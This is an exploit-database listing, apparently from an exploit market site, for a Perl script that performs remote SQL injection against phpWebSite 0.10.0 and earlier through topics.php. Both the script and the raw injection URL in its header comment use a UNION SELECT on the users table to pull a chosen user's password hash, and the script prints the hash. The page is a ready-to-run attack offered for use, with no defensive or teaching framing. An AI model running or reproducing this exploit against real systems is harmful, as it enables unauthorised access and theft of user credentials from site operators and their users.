[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

phpWebSite <= 0.10.0-full (topics.php) Remote SQL Injection Exploit

Author
SnIpEr_SA
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-274
Category
web applications
Date add
24-02-2006
Platform
unsorted
===================================================================
phpWebSite <= 0.10.0-full (topics.php) Remote SQL Injection Exploit
===================================================================




#!/usr/bin/perl
# 
# advisory sent in by SnIpEr_SA (selfar2002[at]hotmail.com)
# http://www.target.com/topics.php?op=viewtopic&topic=-1%20Union%20select%20name,name,pass,name%20From%20users%20where%20uid=1

use LWP::Simple;

$serv     =  $ARGV[0];
$path     =  $ARGV[1];
$uid      =  $ARGV[2];

sub usage
 {
    print "\nUsage: $0 [server] [path] [username] \n";
    print "sever    -  URL\n";
    print "path     -  path to topics.php\n";
    print "uid      -  uid of the user\n\n";
    exit ();}

sub work
 {
    print qq(
       ---------------------------------
#==---[ phpWebSite topic SQL-Injection  |
       ---------------------------------\n\n);&board}

sub board
 {
    $URL = sprintf("http://%s%s/topics.php?op=viewtopic&topic=-1+Union+select+name,name,pass,name+From+users+where+uid=%s",$serv,$path,$uid);
    $content = get "$URL";
    if ($content =~ /(\w{32})/){&showh;}else{print "... One of those days :)\n";}}

sub showh
 {
    print "[*] User: $uid Hash: $1\n\n";}

if (@ARGV != 3){&usage;}else{&work;}



#  0day.today [2024-11-15]  #